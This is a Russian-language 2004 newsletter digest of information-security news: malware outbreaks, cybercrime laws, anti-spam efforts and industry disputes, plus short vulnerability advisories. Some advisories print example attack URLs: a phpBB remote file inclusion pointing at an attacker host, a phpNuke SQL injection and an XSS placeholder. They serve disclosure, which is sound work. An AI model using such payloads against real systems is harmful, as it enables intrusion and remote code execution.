Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- Регулирование: Законы, постановления, сертификация, контроль
- Проблемные ситуации, информационная преступность, сетевые войны
- Технологии безопасности. Организации разработчики, интеграторы.
- Информационая безопасность бизнеса
- Информационая безопасность общественной коммуникации, личности.
- Информационные ресурсы
- Дыры и патчи программ и операционных сред
Регулирование: Законы, постановления, сертификация, контроль |
В России осужден известный вирусописатель
19 ноября | SecurityLab.ru22 октября 2004 года в г. Ижевске был вынесен приговор по делу Е. А. Сучкова, известного в вирусописательской среде под псевдонимом "Whale", сообщает "Лаборатория Касперского". Обвинение было выдвинуто по 273-й статье Уголовного Кодекса РФ.
Евгений Сучков был обвинен в создании двух вредоносных программ - компьютерных вирусов Stepar и Gastropod, а также в публикации исходных кодов этих вирусов и их исполняемых файлов на различных интернет-сайтах, в том числе на сайте известной международной вирусописательской группы 29A.
В ходе судебного разбирательства Евгений полностью признал свою вину и оказал значительную помощь следствию. В результате он был признан виновным в совершении преступления, предусмотренного ч. 1 ст. 273 УК РФ и приговорен к штрафу в размере 3000 рублей.
"Столь мягкое наказание объясняется тем, что у следствия не имелось заявлений от пострадавших в результате действий созданных Сучковым вирусов, - отмечает антивирусный эксперт "Лаборатории Касперского" Александр Гостев. - С другой стороны, не может не радовать тот факт, что это фактически первый уголовный процесс в России, в результате которого к ответственности был привлечен широко известный автор вирусов, состоявший в печально знаменитой международной вирусописательской группе 29A".
США: за файлообмен к уголовной ответственности
18 ноября | www.crime-research.ruЗвукозаписывающие студии и кинокомпании требуют, чтобы Конгресс США одобрил
законопроект, предусматривающий уголовное наказание в виде тюремного заключения
для пользователей пиринговых сетей, сообщает Washington Post. Проект закона уже
обрел противников, которые считают, что от него могут несправедливо пострадать
рядовые потребители. В оппозиционную группу вошли американская Ассоциация
производителей бытовой электроники, компания Verizon Communications, группа по
защите гражданских свобод Public Knowledge и другие.
Пакет документов,
состоящий из восьми законопроектов, рассматривается развлекательной индустрией в
качестве одной из мер борьбы с интернет-пиратством. Согласно законопроекту
Piracy Deterrence and Education Act, те любители файлообмена, кто выложил в
интернете 1000 или более музыкальных композиций, могут лишиться свободы сроком
на пять лет. К уголовной ответственности будут привлекаться и те, кто записывает
фильмы во время сеансов в кинотеатрах. Этот документ уже получил одобрение
Палаты представителей Конгресса США в текущем году. Второй проект закона, PIRATE
Act, позволяет Министерству юстиции США взыскивать убытки в гражданском порядке
с пользователей пиринговых сетей. В настоящее время судебное преследование
возможно только за нарушение копирайта.
По данным Американской ассоциации
звукозаписывающих компаний (RIAA), чем больше популярность пиринговых сетей, тем
сильнее сокращаются продажи и доходы звукозаписывающей индустрии. В частности,
объемы продаж CD уменьшились с 13,2 млрд. долларов США в 2000 году до 11,2 млрд.
долларов США в 2003 году. И хотя в текущем году CD продавались лучше, но
показатели все равно не достигнут результатов 2000 года.
Пока никто не
берется предсказать, будет ли одобрен этот законопроект, однако представители
звукозаписывающих лейблов и кинокомпаний утверждают, что Конгресс поддержит
введение столь строгих мер наказания за пиратство.
Проблемные ситуации, информационная преступность, сетевые войны |
Microsoft категорически отвергает обвинения в пиратстве
19 ноября | SecurityLab.ruЭрин Каллн, ведущий менеджер по продукции подразделения Windows Consumer Division корпорации Microsoft, заявила корреспондентам издания Beta News, что демонстрационные wav-файлы, поставляемые вместе с Windows Media Player Tour в Windows XP, были созданы с использованием легального софта.
Дело в том, что на днях немецкий журнал PC-Welt опубликовал статью, где говорилось, что эти wav-файлы (в частности, wmpaud1.wav) содержат метаданные, в которых есть указание на хакера Deepz0Ne, основателя варезной группы Radium, и на программу SoundForge 4.5, которую в своё время Radium (и лично Deepz0Ne) взламывали и распространяли.
Это наводило на мысли, что в Microsoft использовали взломанную копию Soundforge. Однако по утверждению Каллн, спорная строка, упоминающая в одном ряду и Deepz0Ne, и Soundforge 4.5 (LISTB INFOICRD 2000-04-06 IENG Deepz0ne ISFT SoundForge 4.5), содержалась в тестовом файле-"заглушке", который впоследствии был заменён.
Аудиофайлы, распространяемые вместе с Windows XP, записаны легальным образом, просто, как утверждает Каллн, кто-то забыл устранить метаданные при замене файла-заглушки аудиоинформацией. Что же касается происхождения самой заглушки, то по этому поводу в Microsoft проводится расследование. Будучи одной из основательниц Business Software Alliance (BSA), антипиратского альянса крупнейших производителей коммерческого ПО, корпорация Microsoft не желает сама оказываться под огнём критики за использование нелицензионного ПО.
Ущерб от мошенничества с пластиковыми карточками растет в арифметической прогрессии
19 ноября | www.crime-research.ruОфициальная статистика свидетельствует о том, что количество преступлений,
связанных с использованием пластиковых карт ежегодно увеличивается в несколько
раз, а наносимый ими материальный ущерб возрастает в арифметической прогрессии,
по сравнению с хищениями, совершенными обычными (традиционными) способами.
Поделка кредитных карточек, воровство с помощью ЭВМ приняли характер подлинного
бедствия в США, Италии и других странах. Компании, особенно банки, стремятся
скрыть факты компьютерного воровства, поскольку опасаются падения доверия
вкладчиков, акционеров, партнеров. Поэтому в официальной статистике масштабы
потерь почти не регистрируются. Да и жертвы часто не подозревают, что их
обокрали. Эксперты полагают, что в США с помощью ЭВМ из банков похищают вчетверо
больше, чем при вооруженных ограблениях. За последние 10 лет ежегодные потери
возросли более чем в 20 раз и составляют десятки миллиардов долларов.
До
1990 года подделка кредитных карточек была мало известна. Но уже в 1993 году
Visa и Mastercard потеряли 72 млн. дол. США вследствие мошеннических действий,
из которых 16,8 млн. (23,4%) непосредственно связаны с подделкой карточек. К
1994 году подделка составляла уже 28,6% от общего количества мошеннических
действий с карточками (увеличение на 5%).
По данным Главного
информационного центра МВД России, в 1997 г. было зарегистрировано 53 случая
изготовления или сбыта поддельных кредитных, либо расчетных карт и иных
платежных документов, ущерб от которых составил 1,6 млн. рублей; в 1998 г. – 98
(ущерб 8,8 млн. рублей); в 1999 г. – 325 (ущерб 9,9 млн. рублей); в 2000 г. –
819 (ущерб 3,2 млн. рублей); в 2001 г. – 1508 (ущерб 6,4 млн. рублей); в 2002 г.
– 1814 (ущерб 27,3 млн. рублей); в 2003 г. – 1740 (ущерб 45,7 млн. рублей).
За пять лет (с 1998 по 2002 гг.) количество этих преступных
посягательств увеличилось более чем в 34 раза, наносимый ими материальный ущерб
возрос в 17 раз и составил в 2003 г. в среднем 26 200 рублей на одно
преступление.
Уровень законодательного урегулирования ответственности за
незаконное использование платежных карточек в различных странах отличается.
Если, например, Канада, США, Великобритания имеют достаточно развитое
законодательство по этому поводу, то некоторые страны вообще не имеют в своем
уголовном законодательстве такого термина, как «кредитная карточка». Большинство
стран пребывают на этапе внесения соответствующих дополнений в действующее
уголовное законодательство с целью создания законодательной базы с целью
противодействия этим преступлениям
Panda Software сообщает о появлении Sober.I
19 ноября | @ASTERAЛаборатория PandaLabs обнаружила появление нового
червя Sober.I. Этот вредоносный код был разработан для быстрого распространения
по электронной почте в сообщениях, написанных на английском или немецком языках.
В соответствии с информацией, полученной международной сетью технической
поддержки Panda Software, Sober.I начал свое распространение из
немецко-говорящих стран, вызвав заражения компьютеров по всему
миру.
Сообщения, содержащие Sober.I, имеют различные характеристики. Тема
письма, текст в теле письма, название приложения - все эти параметры выбираются
случайным образом. Если пользователь запускает файл, зараженный вирусом, он
создает большое число файлов на компьютере, таких как clsobern.isc или
nonzipsr.noz, которые являются копиями червя, или же таких как logsys.exe и
syssmss32.exe, которые используются червем для осуществления своих действий.
Как только Sobir.I запущен, он начинает поиск электронных адресов на
зараженном компьютере, на которые он потом отсылает свою копию, используя свой
SMTP механизм. Если домен электронного адреса принадлежит Швейцарии (.ch),
Германии (.de), Австрии (.at) или Лихтенштейну (.li), червь выбирает текст на
немецком языке для электронного сообщения. Если домен принадлежит другим
странам, сообщение отсылается на английском языке.
Также Sobir.I вносит
несколько записей в Реестр Windows для того, чтобы обеспечить свой
автоматический запуск при загрузке компьютера.
Для предотвращения
заражения вирусом BaSobir.I Panda Software советует пользователям принять
необходимые меры и обновить свое антивирусное ПО.
Хакеры все чаще объединяются в ОПГ
18 ноября | SecurityLab.ruСогласно последнему отчету VeriSign, все больше сетевых атак совершается не хакерами-одиночками, а организованными преступными группировками. Кроме того, качественный уровень атак с каждым годом повышается.
Основной целью преступных групп становятся компьютеры обычных интернетчиков. Если ваш компьютер подключен к интернету — вы потенциальная мишень для их атаки, передает News.Com.
Атаки преследуют конкретную цель — заработать денег. Для достижения этой цели преступники устраивают DDoS-атаки на сайты компаний, парализуя их деятельность, воруют номера кредитных карт со взломанных компьютеров, продают рекламу в спам-рассылках или торгуют собственными базами данных адресов электропочты.
Данные исследования базируются на информации, предоставленной компаниями, владеющими онлайн-сервисами, также были изучен мониторинг доступности сайтов, статистика кражи номеров кредитных карт и обобщенные данные по корпоративной безопасности.
Анализ показал, что большинство компьютеров в Америке, подключенных к интернету по широкому каналу, используются преступниками для хакерских атак. Число инцидентов, связанных со взломом компьютеров, увеличилось за год на 150%.
Как сообщают исследователи, к сожалению, выявить злоумышленника практически не возможно. Вычислить компьютер, с которого производится атака — вполне реально. Однако за ним сидит обыкновенный интернетчик, который даже не подозревает, что его компьютер тайно используется для злодеяний.
По данным VeriSign, которые основываются на анализе почтового трафика клиентов компании, доля спама в сообщениях электропочты достигла 80%. Однако, есть и позитивный момент — средний размер спам-письма меньше, чем средний размер «обычного» письма. В связи с этим доля спама в почтовом трафике составляет только 21%.
Cearswift сообщила о появлении «тефлонового вируса»
18 ноября | www.OXPAHA.ru
В Сети появилось новое семейство вирусов, обладающее повышенной устойчивостью к традиционным антивирусным программам и способное без труда проникать сквозь все существующие барьеры.
Как сообщила компания Cearswift, специализирующаяся на обеспечении компьютерной безопасности, новый вирус является «дальним родственником» вируса MyDoom и использует уязвимость «переполнение буфера» браузера Internet Explorer компании Microsoft. Для своего распространения вирус реализует принципиально новую, скользкую, подобно тефлону, стратегию, значительно затрудняющую его обнаружение и борьбу с ним.
В отличие от обычных вирусов, Bofra не содержит в себе ничего «криминального» - например, вложений или какого-либо вредоносного скрипта, написанного на HTML. Единственное, что имеется в вирусе – это ссылка, ведущая на инфицированную машину, на которой вирус уже инсталлировал небольшой веб-сервер. При переходе по ссылке на машину пользователя загружается собственно вредоносная программа. Затем она рассылает аналогичные сообщения по адресам, обнаруженным на машине. Пользователям, в частности, предлагается посетить порносайт с веб-камерами, либо он получает сообщение, «подтверждающее» покупку им кредитной карты. По мнению специалистов Clearswift, подобная технология, заключающаяся в создании многочисленных веб-серверов, обеспечивает чрезвычайно быстрое распространение вируса и крайне осложняет борьбу с ним.
«Раньше авторы вирусов указывали в рассылаемых пользователям Сети письмах ссылки, ведущие на находящиеся под их управлением сервера, однако они имели статический IP-адрес, - указывается в сообщении Clearswift, - и их было сравнительно нетрудно блокировать. Теперь злоумышленникам удалось обойти проблему. В новом черве используются динамические адреса, что чрезвычайно осложняет борьбу с ними».
"Лаборатория Касперского" обнаружила данного червя еще 9 ноября этого года, рассказали CNews.ru в информационной службе компании. Изначально он был назван I-Worm.Mydoom.ad, чуть позже появилась его модификация Mydoom.ae. Однако затем было принято решение переименовать данное семейство в антивирусных базах "Лаборатории Касперского" на I-Worm.Bofra.gen (это общее название семейства, конкретным модификациям присваиваются буквы в алфавитном порядке). Таким образом, I-Worm.Mydoom.ad был переименован в I-Worm.Bofra.b, I-Worm.Mydoom.ae - в I-Worm.Bofra.a. «Первоначально было решено продолжить семейство червей Mydoom, т.к. новые вредоносные программы использовали исходные коды данного червя, однако затем большинство вирусных аналитиков пришло к мнению, что это новое семейство, и мы согласились с этим мнением», - говорит Ольга Кобзарева, и.о. руководителя информационной службы "Лаборатории Касперского".
На данный момент существует уже четыре модификации червя Bofra - a, b, c, d, рассказала г-жа Кобзарева. От исходного варианта I-Worm.Bofra.a они отличаются лишь процедурой регистрации зараженного файла в ключе автозагрузки системного реестра, основной же функционал идентичен во всех четырех вариантах червя. Это вирус-червь, распространяющийся через интернет в виде зараженных писем без вложения, содержащих ссылку на зараженный компьютер. Червь использует недавно обнаруженную и еще не закрытую (Microsoft еще не выпустил соответствующего обновления, оно существует только в Service Pack 2 для ХР, остальные версии или ХР без второго сервис-пака уязвимы) уязвимость в интернет-браузере Internet Explorer. Червь не помещает свою копию в зараженное письмо, а помещает только ссылку на зараженный файл, находящийся на компьютере, с которого пришло это письмо. В момент обращения к полученной ссылке (происходит автоматически в случае срабатывания эксплойта приведенной выше уязвимости) происходит переполнение буфера и автоматический запуск зараженного файла. Письма рассылаются по всем найденным на зараженном компьютере адресам электронной почты. Пример распространения червя - обращение для загрузки своих новых вариантов на уже зараженные машины к ссылке, располагавшейся на сайте http://kjh0.narod.ru/. "Лаборатория Касперского", находясь в хороших отношениях с администрацией хостинга крупного бесплатного российского хостинга narod.ru (принадлежит компании "Яндекс"), обратилась к ним с просьбой как можно скорее закрыть данный сайт, что и было сделано в кратчайшие сроки.
После запуска червь копирует себя с произвольным именем (любой набор символов, который всегда заканчивается на "32.exe"), в системный каталог Windows. Затем регистрирует данный файл в ключе автозагрузки системного реестра. Для поиска адресов жертв червь сканирует адресные книги MS Windows, а также ищет адреса в файлах с различными расширениями. При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам. В письме с червем нет никаких вложений. Червь отправляет только ссылку на зараженный компьютер. Ссылка имеет следующий формат: http://:<номер открытого порта>/<название файла>. Червь открывает на зараженном компьютере TCP-порт от 1639 и выше для скачивания файлов, а также открывает на зараженной машине TCP-порт 6667 для соединения с IRC-каналами для приема команд (бэкдор-функция).
Поскольку в "Лаборатории Касперского" практически не зафиксировано случаев обращения пользователей по поводу данного семейства вредоносных программ, уровень опасности антивирусные эксперты компании считают самым низким, никакой эпидемии, по крайней мере, сейчас нет.
Технологии безопасности. Организации разработчики, интеграторы. |
Билл Гейтс: пароль мертв
19 ноября | ROL
Смарт-карты и 64-разрядные вычисления - вот будущее ИТ, утверждает председатель совета директоров Microsoft Билл Гейтс, а паролям там места нет.
Выступая на ежегодном ИТ-форуме Microsoft в Копенгагене, легендарный основатель Microsoft официально объявил о том, что пароль мертв, а будущее делового мира - за смарт-картами.
Гейтс назвал технологии управления идентификацией (так называемый identity management) "значительным источником запутанности ИТ", добавив, что одна из крупнейших проблем в области информационной безопасности, с которой сталкиваются современные пользователи - так называемый фишинг - не возникла бы вообще, если бы системы были изначально правильно сконфигурированы.
"Существует множество случаев, когда люди пытаются взломать системы идентификации. Если бы они были правильно установлены, мы могли бы определить, каким сайтам вы хотите передать информацию, и свести на нет усилия мошенников, занимающихся фишингом", - отметил он.
Билл Гейтс также заявил, что пароли как средства обеспечения инфобезопасности обречены на вымирание. "Еще один важный вопрос в области систем идентификации - ненадежность паролей, - говорит он. - Мы не собираемся рассчитывать на их надежность".
Что же заменит пароли? По мнению Билла Гейтса, это цифровые средства идентификации, основанные на радиометках и биометрии. "Мы движемся по направлению к биометрии и смарт-картам, - говорит глава софтверного гиганта. - Мы наконец видим, что наши ведущие клиенты начинают предпринимать шаги в этом направлении".
Microsoft собирается использовать смарт-карты в своих офисах, а также планирует в сотрудничестве с Axalto создать смарт-карту на платформе Microsoft .Net. "Microsoft будет использовать смарт-карты внутри компании - каждый сотрудник с помощью одной лишь карты сможет входить и выходить из здания и получать доступ к своей машине: они полностью заменят пароли, даже внутри компании", - говорит Билл Гейтс.
Объявив о кончине пароля, Бил Гейтс перешел к технологии, которая, наоборот, переживает подъем - это 64-разрядные вычисления. "Приход 64-разрядных технологий - по настоящему великое событие, и эти 64-разрядные вычисления будут работать на ваших серверах без повышения их стоимости", - заявил он. Глава корпорации не мог не отметить и успехи Microsoft в этом направлении: "Мы находимся на завершительном этапе тестирования 64-разрядной версии Windows. Внутри компании мы используем много приложений на ее основе". 64-разрядные вычисления также приводятся в качестве аргумента в конкурентной борьбе с крупнейшим поисковиком - Google: Microsoft будет использовать их в серверах. Говоря о своем поисковике MSN, Гейтс отметил, что он "пойдет дальше, чем Google или любой другой поисковый сервис в прошлом".
Борьба со спамом в России выходит на государственный уровень
18 ноября | www.crime-research.ru/В Москве объявлено о создании Российской Национальной коалиции против спама. В
нее вошли семь ведущих компаний (российское представительство Microsoft,
почтовая служба Mail.ru, портал Rambler, служба e-mail-рассылок Subscribe.ru,
агентство "Ашманов и партнеры", "Голден Телеком" и софтверная компания
"Лаборатория Касперского"), считающих себя способными бороться с
несанкционированными интернет-рассылками на законодательном уровне. По
информации "Rambler", спам занимает в России до 75% почтового трафика. Этот
показатель будет увеличиваться, так как спам - самый дешевый способ
рекламирования товаров и услуг, а надежного технического решения проблемы не
существует.
В законодательные органы уже активно поступают
законопроекты, ставящие рассылку спама вне закона. Так, в проекте Федерального
Закона "О правовом регулировании оказания Интернет-услуг" в ст.33 в обязанность
отправителя при отправке рекламных сообщений вменяется указывать в теме
сообщения строку "на правах рекламы", а п.1 ст.37 содержит следующее положение:
"Систематическая умышленная отправка пользователем Интернет по адресам
электронной почты данных, не запрошенных получателем и содержащих рекламу, то
есть, умышленная передача по адресам электронной почты два и более раз в месяц
данных, содержащих рекламу адресату, не передававшему запрос на получение этих
данных влечет административный штраф в размере от трех до пяти минимальных
размеров оплаты труда, а также возмещение убытков, которые возникли в результате
такой передачи данных, если иная ответственность не установлена настоящим
законом и иными правовыми актами". В п.2 данной статьи устанавливается несколько
более значительная ответственность за повторное административное нарушение, а в
ст.38 - солидарная ответственность провайдера за почтовые рассылки отправителя.
В поддержку законопроектов «спам вне закона» выступает также Ассоциация
компаний, предоставляющих услуги рассылки рекламы по электронной почте (DMA -
Ассоциация директ-маркетинга). По словам представителей ассоциации, ежедневный
поток спама создает проблемы и для пользователей, и для компаний,
предоставляющих доступ в Интернет. Ассоциация DMA предлагает на законодательном
уровне наложить запрет на рассылку сообщений без предварительного разрешения
пользователя, с несуществующим обратным адресом и вводящей в заблуждение
пользователя темой сообщения. По мнению DMA, рекламные компании должны в
обязательном порядке указывать в сообщении физический адрес рекламодателя и
контактную информацию отправителя сообщений. Кроме того, в письме должен быть
четко описан способ, как отписаться от рекламной рассылки.
Информационая безопасность бизнеса |
Microsoft предупреждает: за Linux придется платить
19 ноября | SecurityLab.ruСегодня генеральный директор Microsoft Cтив Балмер (Steve Ballmer) предупредил правительства азиатских стран о том, что им могут быть предъявлены иски за нарушение прав на интеллектуальную собственность при использовании операционных систем с открытым исходным кодом (open-source) – таких, как Linux.
Растущая популярность Linux в частных компаниях и правительственных организациях по всему миру, а особенно в Азии, – угроза господствующему положению Windows-платформы.
Ранее Балмер заявил, что Linux нарушила 228 патентов. Деталей он не сообщил, а Linux-сообщество оспаривает утверждение генерального директора Microsoft.
"Однажды всем странам, вступившим в ВТО (Всемирная торговая организация), придется заплатить деньги, причитающиеся за эту интеллектуальную собственность", – добавил Балмер.
В прошлом месяце министерство обороны Сингапура установило на 20 тыс. компьютеров операционные системы open-source вместо Windows. А ранее в этом году Китай, Япония и Южная Корея договорились о совместной разработке программ для ОС Linux.
Китайское правительство, в частности, видит для себя в продукции MS потенциальную угрозу безопасности.
Балмер говорит, что опасения по поводу безопасности их операционной системы раздуты.
Хотят ли в Microsoft войны с Linux?
18 ноября | SecurityLab.ruСудебные разбирательства компании SCO Group, отстаивающей свои права на ОС Unix, пролили свет на вопрос, вокруг которого ходят многочисленные слухи и домыслы – какова роль Microsoft в этой войне?
Теория заговора SCO и Microsoft выглядит довольно правдоподобно: корпорация доминирует на рынке ПК за счет агрессивной политики борьбы с конкурентами – от IBM до Napster. Альтернативная Windows ОС Linux имеет многочисленных поклонников и является своего рода «Немезидой» Microsoft.
Судебные тяжбы SCO с IBM, поддерживающей Linux, стоила компании немалых денег. Так, SCO наняла дорогостоящего юриста Дэвида Бойеса (David Boies), известного по антимонопольному делу Microsoft и суду над Napster. Вместе с тем, денежные активы SCO подходили к концу, а прибыль уменьшалась с каждым кварталом. Поддержка поступила от Microsoft, оказавшей помощь SCO в 2003 году дважды. Без денег Microsoft SCO вряд ли удалось бы провести масштабное судебное разбирательство.
В начале 2003 года Microsoft уплатила SCO $16,6 млн. за лицензию на Unix. До этого такую огромную сумму компании платили только однажды – $9,3 млн. было получено от Sun. В августе и сентябре 2003 года Microsoft сделала еще одно косвенное вливание в SCO. Компания получила $50 млн. от фонда BayStar Capital по рекомендации корпорации.
Деньги Microsoft, переданные SCO, были несомненно значимы для последней. Это можно понять из слов главы SCO Дарла МакБрайда (Darl McBride): «Год назад у нас было $6 млн. Сейчас у нас $60 млн., вместе с $50 млн. инвестиций. У нас есть арсенал для защиты своих прав в суде. Мы думаем, что даже многолетние судебные баталии не исчерпают половины этих средств». Но большинство денег ушло: SCO выплатила их юридическим фирмам за услуги, а также за отказ от привелегированных акций BayStar.
Покупка лицензии может говорить о том, что руководство Microsoft считает, что SCO – действительный хозяин Unix. Но чем тогда является инвестиция BayStar? В конце-концов, зачем помогать компании, которая требует лицензионную плату в миллионы долларов? Как сказал управляющий партнер BayStar, её интерес, вероятно, связан с удержанием своей операционной системы на вершине. Сам факт приобретения Microsoft лицензии на Unix кажется тоже довольно странным. В 1990-х годах фирма Santa Cruz Operation судилась с Microsoft из-за нарушения условий контракта по Unix в 1987 году. Дело было настолько запутанным, что разрешить его удалось лишь при помощи вмешательства Европейской Комиссии.
Является ли Microsoft всего лишь пассивным участником событий? Хочет ли она засудить IBM и Linux и посеять страх, неопределенность и сомнения в среде клиентов?
Информационая безопасность общественной коммуникации, личности. |
Критическая уязвимость в VoIP-клиенте Skype
18 ноября | Internet.RuОшибка, как и следовало ожидать, обнаружена не где-нибудь, а в Windows-версии
популярной программы голосовой связи через интернет. Дыра, найденная
специалистами датской компании Secunia, настолько широка, что позволяет
квалифицированному хакеру получить полный контроль над уязвимым компьютером. Для
того чтобы начать атаку, хакеру достаточно заманить жертву на сайт-ловушку,
после чего Skype-клиент жертвы подвергается атаке с переполнением буфера.
Как сообщает TechWeb, дыра обнаружена в версиях с 1.0.0.95 по 1.0.0.98
включительно. На официальном сайте Skype уже выложена "пропатченная" версия
программы, которой присвоен порядковый номер 1.0.0.100.
Информационные ресурсы |
Обновление IE возможно, утверждает Microsoft
18 ноября | ZDNet.ru:
Microsoft, которую призывают добавить в Internet Explorer новые функции, говорит, что это можно делать через имеющийся в браузере механизм подключения дополнительных модулей.
Microsoft утверждала, что она слишком занята работой над многострадальной операционной системой Longhorn, чтобы возвращаться к разработке браузера. Теперь же компания говорит, что способность браузера к наращиванию позволяет добавлять в IE функции, которые заказчики считают «сверхвысокоприоритетными».
«Это способ для Microsoft наращивать IE, — сказал директор Microsoft по управлению продуктами Windows Гари Скейр. — В центре нашего внимания находится Longhorn, и ко всему, что от него отвлекает, мы относимся с большой осторожностью. Надо сказать, что механизм наращивания очень надежный, и разрабатывать модули для него чрезвычайно легко. Это путь, хотя мы и не планировали это делать».
Скейр, который уже говорил о возможности наращивания IE (об этом сообщалось в Microsoft Watch), отметил, однако, что не любые функции можно добавить к IE в виде дополнений. Например, с функцией Tabbed browsing это не пройдет.
На сайте Windows Marketplace компании недавно открылся раздел, посвященный дополнениям для IE. Среди них только один — MSN Toolbar — является продуктом Microsoft, хотя в списке есть и устаревший уже Service Pack 1. Скейр сказал, что новый сайт дополнений живет активной жизнью, и с момента его открытия предложено уже около тысячи модулей для IE.
Дыры и патчи программ и операционных сред |
Целочисленное переполнение в FreeBSD
19 ноября | SecurityLab.ru
Программа: FreeBSD 4.7, 4.8, 4.9, 4.10, 5.0,
5.1, 5.2.1, 5.3
Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена при обработке HTTP заголовков в функции fetch(). Удаленный атакующий может с помощью специально сформированного HTTP ответа вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. URL производителя: freebsd.org Решение: Установите обновления для соответствующей версии 2004-11-18 12:02:13 UTC (RELENG_5, 5.3-STABLE) |
php инклудинг в phpBB
19 ноября | SecurityLab.ru
Программа: phpBB 2.2.1
Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример: http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/ URL производителя: xore.ca/viewforum.php?f=2 Решение: Решение на данный момент не существует. |
Выполнение произвольного кода в libXpm
19 ноября | SecurityLab.ru
Программа: libXpm R6.8.1 и более ранние
версии
Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость существует из-за множественных ошибок, в том числе целочисленное переполнение, утечка памяти, ошибок при обработке входных данных. Удаленный атакующий может с помощью специально сформированного графического файла вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. URL производителя: http://x.org/ Решение: Установите обновление от производителя X.Org Release 6.8.1: |
Повышение привилегий в Cscope
19 ноября | SecurityLab.ru
Программа: Cscope 15.5 и более ранние версии
Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость существует из-за небезопасного создания временных файлов. Локальный атакующий может создать символическую ссылку с критического файла на системе. После запуска приложения, критический файл будет перезаписан приложением. URL производителя: cscope.sourceforge.net Решение: Решение на данный момент не существует. |
Отказ в обслуживании в Linux
19 ноября | SecurityLab.ru
Программа: Linux kernel 2.4 - 2.4.27, 2.6 -
2.6.9
Опасность: Средняя Наличие эксплоита: Нет Описание: Злонамеренный пользователь, контролирующий sbm сервер, или способный произвести атаку man-in-the-middle, может с помощью специально сформированного smb пакета вызвать отказ в обслуживании. URL производителя: www.kernel.org Решение: Установите обновление от
производителя |
SQL-инъекция в phpNuke Event Calendar
18 ноября | SecurityLab.ru
Программа: phpNuke Event Calendar 2.13
Опасность: Высокая Наличие эксплоита: Да Описание: 1. Уязвимость существует из-за некорректной фильтрации входных данных в переменной edi. Удаленный атакующий может выполнить произвольные SQL команды. Пример: http://[target]/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT 2. Удаленный атакующий может выполнить произвольный HTML сценарий в браузере жертвы с помощью специально сформированного URL. Примеры: http://[target]/nuke73/modules.php?name=Calendar&file=submit&type=[xss
code here] Удаленный атакующий с помощью специально сформированного URL может определить путь к установочной директории на сервере. Примеры: http://[target]/nuke73/modules/Calendar/config.php
URL производителя: phpnuke.holbrookau.net Решение: Решение на данный момент не существует. |
Обход ограничений в phpScheduleIt
18 ноября | SecurityLab.ru
Программа: phpScheduleIt версии до 1.0.1
Опасность: Средняя Наличие эксплоита: Нет Описание: URL производителя: phpscheduleit.sourceforge.net Решение: Установите обновление |
Инструменты управления содержанием Метод.ру
Дата создания документа: 19:09 19.11.04
http://subscribe.ru/
http://subscribe.ru/feedback/ |
Подписан адрес: Код этой рассылки: inet.safety.cybersecurity |
Отписаться |
В избранное | ||